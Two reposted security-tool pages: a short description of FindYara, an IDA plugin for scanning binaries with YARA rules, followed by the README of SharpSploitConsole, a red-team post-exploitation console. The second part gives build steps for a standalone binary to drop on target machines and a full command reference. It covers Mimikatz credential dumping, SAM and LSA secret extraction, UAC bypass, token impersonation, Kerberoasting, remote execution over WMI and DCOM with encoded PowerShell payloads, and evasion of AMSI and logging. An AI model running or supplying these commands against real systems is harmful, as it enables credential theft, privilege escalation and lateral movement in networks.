FindYara – IDA Python Plugin To Scan Binary With Yara Rules

Use this IDA Python plugin to scan your binary with yara rules. All the yara rule matches will be listed with their offset so you can quickly hop to them!

All credit for this plugin and the code goes to David Berard (@p0ly). This plugin is copied from David's excellent findcrypt-yara plugin. This plugin just extends his to use any yara rule.

Installation

- Install yara-python. Using pip: pip install yara-python. Other methods: https://pypi.python.org/pypi/yara-python
- Copy FindYara.py to your IDA "plugins" directory

Watch the tutorial video: Yara Rules With IDA Pro

Usage

- Launch the plugin: The plugin can be launched from the menu using Edit->Plugins->FindYara. Or the plugin can be quickly launched using the hot-key combination ctl-alt-y.
- Select a Yara file to scan with: When the plugin launches it will open a file selection dialogue box. You will need to use this to choose the yara file that you want to scan with.
- View matches: All of the strings from the yara rule that match the binary will be displayed along with the match locations.

Acknowledgments

A huge thank you to David Berard (@p0ly) – follow him on GitHub here! This is mostly his code and he gets all the credit for the original plugin framework.

Also, hat tip to Alex Hanel @nullandnull – follow him on GitHub here. Alex helped me sort through how the IDC methods are being used. His IDA Python book is a fantastic reference!!

Feedback / Help

Any questions, comments, requests: hit me up on Twitter: @herrcore

Pull requests welcome!

Link: http://feedproxy.google.com/~r/PentestTools/~3/SUaACTisvsI/findyara-ida-python-plugin-to-scan.html

SharpSploitConsole – Console Application Designed To Interact With SharpSploit

Console application designed to interact with SharpSploit, released by @cobbr_io.

SharpSploit is a tool written by @cobbr_io that combines many techniques/C# code from the infosec community into one sweet DLL. It's awesome, so check it out!

Description

SharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit. By following the instructions below you should be able to embed both the SharpSploit.dll and System.Management.Automation.dll into the SharpSploitConsole binary, creating a standalone exe you can drop on an appropriate target system and run over a non-interactive shell (such as beacon).

This concept can be applied to many C# binaries. For example, we could embed the System.Management.Automation.dll into our favorite C# NoPowershell.exe, creating a binary that doesn't rely on the System.Management.Automation.dll on the target system.

Contact at: Twitter @anthemtotheego or @g0ldengunsec

Setup – Quick and Dirty

Note: For those of you who don't want to go through the trouble of compiling your own, I uploaded an x64 and x86 binary, found in the CompiledBinaries folder. For those of you who do want to compile your own... I used Windows 10 and Visual Studio 2017 – mileage may vary.

1. Download the SharpSploit tool from https://github.com/cobbr/SharpSploit.git
2. Open up SharpSploit.sln in Visual Studio and compile (make sure to compile for the correct architecture): you should see a drop-down showing Any CPU > click on it and open Configuration Manager > under Platform change to the desired architecture and select OK.
3. Download the SharpSploitConsole tool and open up SharpSploitConsole.sln
4. Copy both SharpSploit.dll and System.Management.Automation.dll, found in the SharpSploit/bin/x64/Debug directory, into the SharpSploitConsole/bin/x64/Debug folder
5. Next we will set up Visual Studio to embed our DLLs into our exe so we have a single binary we can run on our target machine. We will do this by doing the following in Visual Studio:
   a. Tools > NuGet Package Manager > Package Manager Console
   b. Inside the console run: Install-Package Costura.Fody
   c. Open up notepad, paste the code below and save it with the name FodyWeavers.xml inside the SharpSploitConsole directory that holds your bin, obj and Properties folders:

      <Weavers>
        <Costura />
      </Weavers>

6. Inside Visual Studio, right click References on the right-hand side, choose Add Reference, then browse to the SharpSploitConsole/bin/x64/Debug directory where we put our two DLLs, select them and add them.
7. Compile, drop the binary on the target computer and have fun.

Examples

Note: All commands are case insensitive.

By default all commands can be taken in as command line args; they will be executed and the program will exit (great for remote shells). This looks something like the following: sharpSploitConsole.exe getSystem logonPasswords. Alternatively, if you want to use the interactive console mode, you can use the interact command to get a pseudo-interactive shell.

Start interactive console mode:
    Interact

Mimikatz all the things (does not run DCSync) – requires admin or system:
    Mimi-All

Runs a specific Mimikatz command of your choice – requires admin or system:
    Mimi-Command privilege::debug sekurlsa::logonPasswords

Runs the Mimikatz command privilege::debug sekurlsa::logonPasswords – requires admin or system:
    logonPasswords

Runs the Mimikatz command to retrieve Domain Cached Credentials hashes from the registry – requires admin or system:
    LsaCache

Runs the Mimikatz command to retrieve LSA Secrets stored in the registry – requires admin or system:
    LsaSecrets

Retrieve password hashes from the SAM database – requires admin or system:
    SamDump

Retrieve Wdigest credentials from the registry – requires admin or system:
    Wdigest

Retrieve current user:
    whoami
    Username

Impersonate system user – requires admin rights:
    GetSystem

Impersonate system user – impersonate the token of a specified process, requires pid – command requires admin rights:
    Impersonate 2918

Bypass UAC – requires binary | command | path to binary – requires admin rights:
    BypassUAC cmd.exe ipconfig C:\Windows\System32\
    BypassUAC cmd.exe "" C:\Windows\System32\

Ends the impersonation of any token, reverts back to the initial token associated with the current process:
    RevertToSelf

Retrieve current working directory:
    CurrentDirectory

Retrieve current directory listing:
    DirectoryListing

Changes the current directory by appending a specified string to the current working directory:
    ChangeDirectory SomeFolder

Retrieve hostname:
    Hostname

Retrieve list of running processes:
    ProcessList

Creates a minidump of the memory of a running process, requires PID | output location | output name – requires admin:
    ProcDump 2198 C:\Users\Username\Desktop memorydump.dmp

Retrieve registry path value, requires full path argument:
    ReadRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\BuildNumber

Write to registry, requires full path argument and value argument:
    WriteRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\RemoteAccessEnabled 1

Retrieve users of local group remotely, requires computername | groupname | username | password:
    NetLocalGroupMembers computerName Administrators domain\username P@55w0rd!
    NetLocalGroupMembers 192.168.1.20 Administrators .\username P@55w0rd!

Retrieve local groups remotely, requires computername | username | password:
    NetLocalGroups computerName domain\username P@55w0rd!
    NetLocalGroups 192.168.1.20 .\username P@55w0rd!

Retrieve current logged on users remotely, requires computername | username | password:
    NetLoggedOnUsers computerName domain\username P@55w0rd!
    NetLoggedOnUsers 192.168.1.20 .\username P@55w0rd!

Retrieve user sessions remotely, requires computername | username | password:
    NetSessions computerName domain\username P@55w0rd!
    NetSessions 192.168.1.20 .\username P@55w0rd!

Ping systems, requires computernames:
    Ping computer1 computer2 computer3 computer4

Port scan systems, requires computername | ports:
    PortScan computer1 80 443 445 22 23

Get Domain Users: grabs specified (or all) user objects in the target domain, by default using the current user context. Optional arguments: -username -password -domain -server -searchbase -searchstring -target
    GetDomainUsers

Get Domain Groups: grabs specified (or all) group objects in the target domain, by default using the current user context. Optional arguments: -username -password -domain -server -searchbase -searchstring -target
    GetDomainGroups
    GetDomainGroups -target "Domain Admins"

Get Domain Computers: grabs specified (or all) computer objects in the target domain, by default using the current user context. Optional arguments: -username -password -domain -server -searchbase -searchstring -target
    GetDomainComputers

Perform Kerberoasting: performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default using the current user context. Optional arguments: -username -password -domain -server -searchbase -searchstring -target
    Kerberoast
    Kerberoast -username bob -password Password1 -domain test.corp -server 192.168.1.10 -target sqlService

Run command remotely via WMI, requires computername | username | password | command – requires admin:
    WMI computer1 domain\username P@55w0rd! <entire powershell empire payload>
    WMI computer1 .\username P@55w0rd! powershell -noP -sta -w 1 -enc <Base64>

Run command remotely via DCOM, requires computername | command | directory | params – requires admin:
    DCOM computer1 cmd.exe c:\Windows\System32 powershell -noP -sta -w 1 -enc <Base64>

Run shell command:
    Shell ipconfig /all

Run powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging:
    Powershell -noP -sta -w 1 -enc <Base64>

Currently available options (more to come)

- Interact : Starts interactive console mode; if you are interacting remotely you may not want to use this option
- Mimi-All : Executes everything but DCSync, requires admin
- Mimi-Command : Executes a chosen Mimikatz command
- logonPasswords : Runs privilege::debug sekurlsa::logonPasswords
- LsaCache : Retrieve Domain Cached Credentials hashes from registry
- LsaSecrets : Retrieve LSA secrets stored in registry
- SamDump : Retrieve password hashes from the SAM database
- Wdigest : Retrieve Wdigest credentials from registry
- whoami : Retrieve current user
- GetSystem : Impersonate system user, requires admin rights
- Impersonate : Impersonate the token of a specified process, requires pid – command requires admin rights
- BypassUAC : Bypass UAC, requires binary | command | path to binary – requires admin rights
- RevertToSelf : Ends the impersonation of any token, reverts back to initial token associated with current process
- CurrentDirectory : Retrieve current working directory
- DirectoryListing : Retrieve current directory listing
- ChangeDirectory : Changes the current directory by appending a specified string to the current working directory
- Hostname : Retrieve hostname
- ProcessList : Retrieve list of running processes
- ProcDump : Creates a minidump of the memory of a running process, requires PID | output location | output name – requires admin
- Username : Retrieve current username
- ReadRegistry : Retrieve registry path value, requires full path argument
- WriteRegistry : Write to registry, requires full path argument | value
- NetLocalGroupMembers : Retrieve users of local group remotely, requires computername | groupname | username | password
- NetLocalGroups : Retrieve local groups remotely, requires computername | username | password
- NetLoggedOnUsers : Retrieve current logged on users remotely, requires computername | username | password
- NetSessions : Retrieve user sessions remotely, requires computername | username | password
- Ping : Ping systems, requires computernames
- PortScan : Port scan systems, requires computername | ports
- GetDomainUsers : Grabs specified (or all) user objects in the target domain, by default will use current user context
- GetDomainGroups : Grabs specified (or all) group objects in the target domain, by default will use current user context
- GetDomainComputers : Grabs specified (or all) computer objects in the target domain, by default will use current user context
- Kerberoast : Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context
- WMI : Run command remotely via WMI, requires computername | username | password | command – requires admin
- DCOM : Run command remotely via DCOM, requires computername | command | directory | params – requires admin
- Shell : Run a shell command
- Powershell : Runs a powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging

Download SharpSploitConsole

Link: http://feedproxy.google.com/~r/PentestTools/~3/kATTdJ2komM/sharpsploitconsole-console-application.html